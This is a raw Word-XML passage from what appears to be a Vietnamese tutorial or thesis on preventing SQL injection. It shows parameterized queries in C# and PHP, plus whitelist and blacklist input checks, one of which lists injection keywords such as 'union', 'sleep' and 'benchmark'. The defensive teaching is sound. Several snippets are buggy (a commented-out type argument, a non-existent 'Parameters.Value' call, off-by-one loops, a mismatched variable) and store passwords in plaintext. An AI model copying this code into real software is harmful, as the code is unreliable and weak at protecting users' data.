          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Add(“@username”, // nameSqlDbType.NVarChar, // data type</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>16); // length</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Add(“@password”,SqlDbType.NVarChar,16);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Value[“@username”] = username; // set parameters</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>cmd.Parameters.Value[“@password”] = password; // to supplied values</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E72392" w:rsidRPr="00E72392" w:rsidRDefault="00E72392" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E72392">
              <w:t>reader = cmd.ExecuteReader();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AD2AED" w:rsidRDefault="00CA4181" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t>Đối với ngôn ngữ lập trình PHP, ngôn ngữ này cũng cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve"> nhiều</w:t>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t xml:space="preserve"> framework để truy cập dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>mysqli</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EB1EB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>PEAR::MDB2</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EE2381" w:rsidRPr="00EE2381">
        <w:t>PHP Data Objects (PDOs) framework</w:t>
      </w:r>
      <w:r w:rsidR="00EE2381">
        <w:t>. Tất cả các framework này đều hỗ trợ việc tham số hóa dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidR="00A65A26">
        <w:t xml:space="preserve"> đối với </w:t>
      </w:r>
      <w:r w:rsidR="00A65A26" w:rsidRPr="00A65A26">
        <w:t>mysqli</w:t>
      </w:r>
      <w:r w:rsidR="00A65A26">
        <w:t xml:space="preserve"> có thể sử dụng như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736345" w:rsidRPr="00736345" w:rsidTr="00736345">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:lastRenderedPageBreak/>
              <w:t>$con = new mysqli(“localhost”, “username”, “password”, “db”);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t xml:space="preserve">$sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00736345">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00736345">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd = $con-&gt;prepare($sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>// Add parameters to SQL query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003B6416" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd-&gt;bind_param(“ss”, $username, $password); // bind parameters as strings</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00736345" w:rsidRPr="00736345" w:rsidRDefault="00736345" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00736345">
              <w:t>$cmd-&gt;execute();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A65A26" w:rsidRDefault="000A4959" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00934855" w:rsidRPr="00934855">
        <w:t>PEAR::MDB2 package</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t xml:space="preserve"> cung cấp khả năng tham số hóa, sử dụng dấu h</w:t>
      </w:r>
      <w:r w:rsidR="00520B88">
        <w:t>ỏ</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t>i chấm (</w:t>
      </w:r>
      <w:r w:rsidR="00520B88">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00934855">
        <w:t xml:space="preserve">) để đánh dấu vị trí tham số hóa. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidTr="00520B88">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$mdb2 =&amp; MDB2::factory($dsn);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t xml:space="preserve">$sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="00520B88">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="00520B88">
              <w:t xml:space="preserve"> FROM users WHERE username=? AND password=?”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$types = array(‘text’, ‘text’); // set data types</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$cmd = $mdb2-&gt;prepare($sql, $types, MDB2_PREPARE_MANIP);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$data = array($username, $password); // parameters to be passed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00520B88" w:rsidRPr="00520B88" w:rsidRDefault="00520B88" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00520B88">
              <w:t>$result = $cmd-&gt;execute($data);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00520B88" w:rsidRDefault="006B2163" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00756590" w:rsidRPr="00756590">
        <w:t>PDO</w:t>
      </w:r>
      <w:r w:rsidR="00756590">
        <w:t xml:space="preserve"> hỗ trợ việc đánh dấu cả bằng dấu hỏi, hoặc dấu hai chấm (:)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidTr="00756590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t xml:space="preserve">$sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="006957A4">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006957A4">
              <w:t xml:space="preserve"> FROM users WHERE username=:username AND” +“password=:password”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt = $dbh-&gt;prepare($sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>// bind values and data types</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;bindParam(‘:username’, $username, PDO::PARAM_STR, 12);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006957A4" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;bindParam(‘:password’, $password, PDO::PARAM_STR, 12);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00756590" w:rsidRPr="006957A4" w:rsidRDefault="00756590" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006957A4">
              <w:t>$stmt-&gt;execute();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00756590" w:rsidRPr="00DB7B2D" w:rsidRDefault="00DB7B2D" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc459822518"/>
      <w:r w:rsidRPr="00DB7B2D">
        <w:t>Sử dụng xác nhận đầu vào (Validating input)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00D16775" w:rsidRPr="00A909F8" w:rsidRDefault="00D16775" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F6DCD" w:rsidRPr="009F6DCD">
        <w:t>Input valid</w:t>
      </w:r>
      <w:r w:rsidR="009F6DCD">
        <w:t>ation là quá trình kiểm tra đầu vào</w:t>
      </w:r>
      <w:r w:rsidR="00F54753">
        <w:t xml:space="preserve"> bởi ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="009F6DCD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F54753">
        <w:t xml:space="preserve">đảm bảo đầu vào phù hợp với tiêu chuẩn thiết lập trước. </w:t>
      </w:r>
      <w:r w:rsidR="003E2412">
        <w:t>Thực tế có sử dụng các biểu thức chính quy (</w:t>
      </w:r>
      <w:r w:rsidR="003E2412" w:rsidRPr="003E2412">
        <w:t>regular expressions</w:t>
      </w:r>
      <w:r w:rsidR="003E2412">
        <w:t>) hay logic nghiệp vụ để kiểm tra đầ</w:t>
      </w:r>
      <w:r w:rsidR="00562F29">
        <w:t>u vào. Có hai loại kiểm tra đầu vào: danh sách whitelist và danh sách blacklist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00455D2B" w:rsidRDefault="005F7946" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00455D2B" w:rsidRPr="005F7946">
        <w:t>ỹ thuật danh sách white-list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là chỉ chấp nhận các đầu vào được cho là tốt. </w:t>
      </w:r>
      <w:r w:rsidR="00A74FA1">
        <w:t xml:space="preserve">Nó liên quan đến các ràng buộc </w:t>
      </w:r>
      <w:r w:rsidR="007F0E35">
        <w:t xml:space="preserve">đã biết </w:t>
      </w:r>
      <w:r w:rsidR="00A74FA1">
        <w:t xml:space="preserve">liên quan đến dữ liệu sẽ được truyền vào: </w:t>
      </w:r>
      <w:r w:rsidR="007F0E35">
        <w:t>kiểu, độ dài, các tiêu chuẩn/ định dạ</w:t>
      </w:r>
      <w:r w:rsidR="003A14BC">
        <w:t>ng.. Ví dụ nếu đầu vào là số thẻ tín dụng, thì sẽ có độ dài từ 13 đến 16, và chỉ là dạng chữ số</w:t>
      </w:r>
      <w:r w:rsidR="009A5006">
        <w:t xml:space="preserve">. Ngoài ra, còn phải đảm bảo công thức </w:t>
      </w:r>
      <w:r w:rsidR="009A5006" w:rsidRPr="009A5006">
        <w:t>Luhn</w:t>
      </w:r>
      <w:r w:rsidR="009A5006">
        <w:t>, liên quan đến chữ số cuối cùng của dãy số.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A82306" w:rsidRDefault="00A82306" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Một cách tiếp cận tương tự trong kiểm tra dạng whitelist là: danh sách đầu vào đã biết trước</w:t>
      </w:r>
      <w:r w:rsidR="005E495B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C2C35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E495B">
        <w:t xml:space="preserve">Danh sách đầu vào là một tập các giá trị hợp lệ, nếu nằm ngoài danh sách này sẽ từ chối. </w:t>
      </w:r>
      <w:r w:rsidR="00CE3969">
        <w:t>Phương pháp này thường áp dụng trong trường hợp đầu vào là các tên bảng, tên cột, hoặc các giá trị tĩnh, không thay đổi. đối với phương pháp tối ưu dựa trên phân tích thứ tự trả về, phương pháp này đặc biệt có hiệu quả. Bởi vì đầu vào phải là một tên cột nào đó, nên chỉ cần kiểm tra đầu vào có nằm trong danh sách các tên cột đó hay không.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidTr="00AB5C7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>$whitelist_list  = array('id','name','point');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>$found = false;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>for($i=0;$i&lt;=sizeof($</w:t>
            </w:r>
            <w:r w:rsidR="00DF6A89" w:rsidRPr="00DF6A89">
              <w:t>whitelist</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>_list);$i++)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>if($whitelist_list[$i] === $input)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{ $found = true;break;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AB5C7E" w:rsidRPr="00DF6A89" w:rsidRDefault="00AB5C7E" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>if($found==false)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">      echo “Attacked”; //Print alert</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">      exit();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t xml:space="preserve">    //Do it</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF6A89" w:rsidRPr="00DF6A89" w:rsidRDefault="00DF6A89" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00DF6A89">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C3FBD" w:rsidRDefault="000B5CFF" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Kỹ thuật thứ</w:t>
      </w:r>
      <w:r w:rsidR="003E1679">
        <w:t xml:space="preserve"> hai là backlist, thực hiện từ chối nếu đầu vào là xấu. ban đầu, lập trình viên định nghĩa tập các mẫu để nhận diện đấy là đầu vào xấu, chứa mã tấn công. Nếu như đầu vào từ người dùng có chứa các mẫu này thì sẽ là loại bỏ, không thực hiện. Kỹ thuật này thường được triển khai phổ biến ở nhiều ứng dụng khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidTr="00E921F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>$black_list  = array('sleep','benchmark','union','--','#','/','*',';');</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:t>for($i=0;$i&lt;=sizeof($black_list);$i++)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:lastRenderedPageBreak/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>$pos = strpos(strtolower($point), $black_list[$i]);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>if (is_numeric($pos))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>echo "Attack!!!!!";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E921F1" w:rsidRPr="00E921F1" w:rsidRDefault="00E921F1" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E921F1">
              <w:tab/>
              <w:t>exit(0);</w:t>
            </w:r>
          </w:p>
